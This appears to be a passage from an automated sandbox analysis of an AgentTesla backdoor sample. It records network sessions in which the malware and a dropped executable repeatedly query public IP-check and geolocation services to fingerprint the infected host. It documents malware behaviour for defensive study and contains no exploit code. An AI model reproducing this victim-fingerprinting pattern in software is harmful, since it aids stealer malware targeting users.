Oct 22, 2024 15:42:33.450314999 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:35.162425041 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 79a4d32d949717005075ed25c86cdd7b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:35.162966967 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 79a4d32d949717005075ed25c86cdd7b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:35.163542032 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 79a4d32d949717005075ed25c86cdd7b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49791	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:33.467983007 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:35.162636042 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cc07440b0e502dc28397d59073fb2c57 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:35.163105965 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cc07440b0e502dc28397d59073fb2c57 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 15:42:35.163615942 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cc07440b0e502dc28397d59073fb2c57 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49806	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:35.936964035 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:36.803333044 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 13a8b124ad97d1d7b945b1e837cb264c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49819	132.226.247.73	80	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 15:42:37.573689938 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 22, 2024 15:42:38.448908091 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:38 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 83a3ee6abae9533b99dfcb8bc0b9e724 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:21 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:21 UTC	898	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29897 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybZvehWASItBiOiWtwbSq%2Fytr%2FlIPCtCuy3X9GYakeB5CTjjaiFa1WtAxKISt1VwE0naHBvt1%2FeEAupSb0SjY0tnWqBBXGp%2F80nUUfntWZ%2FVTovwh9TWusxIkYhMhMeqItRyIE6h"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e8ffea656c54-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2560565&cwnd=250&unsent_bytes=0&cid=1729275cfd1639d5&ts=395&x=0"
2024-10-22 13:42:21 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49716	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:22 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:22 UTC	890	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29898 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6tMnk4hhGE8VaMuMEzLLPbZR3eoxhert2YpnpH%2FgzPgMwoRYX0TFHKTaEKtQ1fA25AvqVkhKa1gxjGGgi8rKLgMTrZhRB1CPZJTXduGQJuZuAweX6gzZOoqWlfSryh1LEY49GHp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e9065d916c81-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2292953&cwnd=251&unsent_bytes=0&cid=05fa8793fca239d2&ts=146&x=0"
2024-10-22 13:42:22 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49722	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:24 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:24 UTC	894	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29900 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RugxeSpEHwY0DG8AFXFTvzS8H9hheH9varaAvDLisgUOzmYRLLIM6UrJUxaugIKeVWvOh%2FnKx9HxHXNpl3w3MKzaV3WkU%2FRcUU7TiD9QL9LLuj%2FbMVyevHyiE14YgMuqHD6QliM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e913588b2fec-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1388&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2073013&cwnd=251&unsent_bytes=0&cid=248ba299bb5623fa&ts=594&x=0"
2024-10-22 13:42:24 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49724	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:25 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:25 UTC	892	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29901 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tfPTLXt3Wuux%2FKvAmdzkX5raoDYhyd7xGQ6Sry4XEoGcAuNNM1KSMoxuMBCwc7U90dyGumrkT2HIqYkdKDQWgjxV7GkkkVjZUYC1Q1QCGkPwvrc4Kano7%2FveBiyeZ1XocGdalEpx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e9199f21e916-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2560565&cwnd=251&unsent_bytes=0&cid=34019d4264bc569c&ts=230&x=0"
2024-10-22 13:42:25 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49730	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:26 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:26 UTC	894	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29902 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dr%2Fj2b74QF0PfGFprkb5%2BF5sMdphuG2GfbdN2Wq5gno8sVaNoYUt07Bzr87vHiImxZBi2NxrsEZzcRkAIQHyyvKHoJzID9d7RQj5Q0ASgU505i7Wa6WExUIaxTx9y0Uz%2BzcmDgOb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e91dacc26b13-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1162&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2431570&cwnd=251&unsent_bytes=0&cid=03b2a8a1ab030fd6&ts=162&x=0"
2024-10-22 13:42:26 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49736	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:26 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:26 UTC	898	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29902 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ci1tWONzM0CDvEMHCn6GtYoZ2IOOj5YUH%2F666Hyg%2BBfyf%2FMt1CLCPsOayBFrkx%2F%2FDFntkW32i2TVq3VX7O1sDTfIq6dyBR4Z1XsvZTQi0SOF6bkxDClEdrxpQDssEQbyu5L0fAPz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e92039d14758-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2302066&cwnd=227&unsent_bytes=0&cid=5dabb0867a7b05a3&ts=169&x=0"
2024-10-22 13:42:26 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49744	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:27 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:27 UTC	896	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29903 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F1GdE5tcxSpIx%2FQ0WZgeMAQVzqKgvcxN1%2FpqceOoHhTKQjM6GmYgBTdwBrLDBVSe4X0MkLnYLxR4vvC9m3GGaj%2Bchlcrttk9b%2F3vgeZZYY0ocM30TwvQ9ZaO6VpRuuAkGrzXXd0i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e927ff4f3594-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2157973&cwnd=251&unsent_bytes=0&cid=34f2747c457addba&ts=148&x=0"
